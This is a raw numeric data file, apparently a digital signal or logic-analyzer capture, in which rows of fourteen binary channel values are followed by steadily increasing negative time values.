0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2197200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2194400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2192000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2189200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2186800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2184400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2182000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2179600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2177200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2174400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2172000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2169200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2166800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2164400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2162000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2159600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2157200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2154800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2152400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2150000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2147200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2144800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2142000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2139600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2137200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2134800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2132400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2130000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2127200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2124800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2122000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2119600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2117200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2114800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2112400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2110000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2107200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2104800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2102000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2099600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2097200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2094800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2092400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2090000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2087200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2084800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2082000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2079600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2076400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2074000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2071600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2069200e-04 0,0,1,1,0,1,0,0,0,1,0,0,0,0,-5.2068800e-04 0,0,1,1,0,1,0,0,0,1,0,0,0,1,-3.9597200e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,1,-3.9574400e-04 1,0,1,1,0,1,0,0,0,1,0,1,0,1,-3.9571600e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,1,-3.9569200e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,1,-3.9536000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,1,-3.9533200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,1,-3.9532800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,1,-3.9530800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,1,-3.9528400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,1,-3.9526000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,1,-3.9523600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,1,-3.9521200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,1,-3.9518400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,1,-3.9516000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9514000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9513200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9510800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9508400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9506000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9503600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9501200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9498400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9496000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9493200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9488400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9486000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9485200e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9480800e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9478400e-04 1,0,1,1,0,1,0,0,0,0,0,0,0,0,-3.9478000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9477600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9475600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9473200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9470800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9468400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9466000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9463600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9461200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9458400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9456000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9453200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9450800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9448400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9446000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9443600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9441200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9438400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9436000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9433200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9430800e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9428000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9424400e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9416000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9413600e-04 1,0,1,1,0,1,0,0,0,0,0,0,0,0,-3.9412800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9412400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9411600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9409200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9403600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9401200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9398800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9396400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9394400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9392400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9390000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9387600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9385200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9383200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9380800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9378800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9374000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9371600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9369600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9367600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9365200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9362800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9360400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9358000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9355600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9353200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9350800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9348400e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9347600e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9345600e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9343200e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9340400e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9338000e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9332000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9329600e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9327600e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9325200e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9322800e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9320400e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9316400e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9314000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9313200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9311600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9309200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9306800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9305200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9302800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9300400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9298000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9295600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9293200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9290400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9288000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9285600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9282800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9280400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9278000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9275600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9273200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9270400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9268000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9265600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9262800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9260400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9258000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9255600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9253200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9250400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9248000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9245600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9242800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9240400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9238000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9235600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9233200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9230400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9225600e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9222800e-04 1,0,1,1,0,1,0,0,0,1,0,0,1,0,-3.9218000e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.9215600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9214800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9213200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9210400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9208000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9205200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9202800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9200400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9198000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9195600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9193200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9190400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9187600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9185200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9182800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9180000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9177200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9174800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9172400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9170000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9167600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9164400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9162000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9159600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9154400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9151600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9149200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9146800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9144400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9142000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9139600e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9137200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9134400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9132000e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9129200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9126800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9124400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9121600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9119200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9116400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9114000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9111600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9109200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9106800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9104400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9101600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9099200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9096400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9094000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9091600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9089200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9086800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9084000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9081200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9078800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9076400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9074000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9071600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9069200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9066400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9064000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9061200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9058800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9056400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9054000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9051600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9049200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9046400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9044000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9041200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9038800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9036400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9034000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9031600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9029200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9026400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9024000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9021200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9018800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9016400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9014000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9011600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9009200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9006400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.9004000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.9001200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8998800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8996400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8994000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8991600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8989200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8986400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8984000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8981200e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8978800e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8976400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8974000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8971600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8969200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8966400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8964400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8961600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8959200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8956400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8954000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8951600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8949200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8946800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8944400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8941600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8939200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8936400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8934000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8931600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8929200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8926800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8924400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8921600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8919200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8916400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8914000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8911600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8909200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8906800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8904400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8901600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8899200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8896400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8894000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8891600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8889200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8886800e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8884400e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8881600e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8879200e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8876400e-04 1,0,1,1,0,0,0,0,0,0,0,0,1,0,-3.8874000e-04 1,0,1,1,0,0,0,0,0,0,0,0,0,0,-3.8871600e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,0,-3.8871200e-04 1,0,1,1,0,1,0,0,0,1,0,0,0,1,-2.6406800e-04 0,0,1,1,0,1,0,0,0,1,0,0,0,1,-2.6386800e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,1,-2.6384400e-04 0,1,1,1,0,1,0,0,0,1,0,1,0,1,-2.6381200e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,1,-2.6379200e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,1,-2.6346000e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,1,-2.6343600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,1,-2.6342800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,1,-2.6340800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,1,-2.6338400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,1,-2.6336000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,1,-2.6333200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,1,-2.6330800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,1,-2.6328400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,1,-2.6326000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6323600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6320800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6318400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6315600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6313200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6310800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6308400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6303600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6300800e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6300400e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6298400e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6295600e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6290800e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6288400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6287600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6286000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6283600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6280800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6278400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6275600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6273200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6270800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6268400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6266000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6263600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6261200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6258400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6255600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6253200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6250800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6248400e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6246000e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6243600e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6240800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6238400e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6238000e-04 0,1,1,1,0,1,0,0,0,1,0,0,1,0,-2.6233200e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6230800e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6230000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6228400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6226000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6223600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6221200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6218400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6216000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6213200e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6210800e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6208400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6206000e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6203600e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6201200e-04 0,1,1,1,0,0,0,0,0,0,0,0,1,0,-2.6198400e-04 0,1,1,1,0,0,0,0,0,0,0,0,0,0,-2.6196000e-04 0,1,1,1,0,1,0,0,0,1,0,0,0,0,-2.6195600e-04 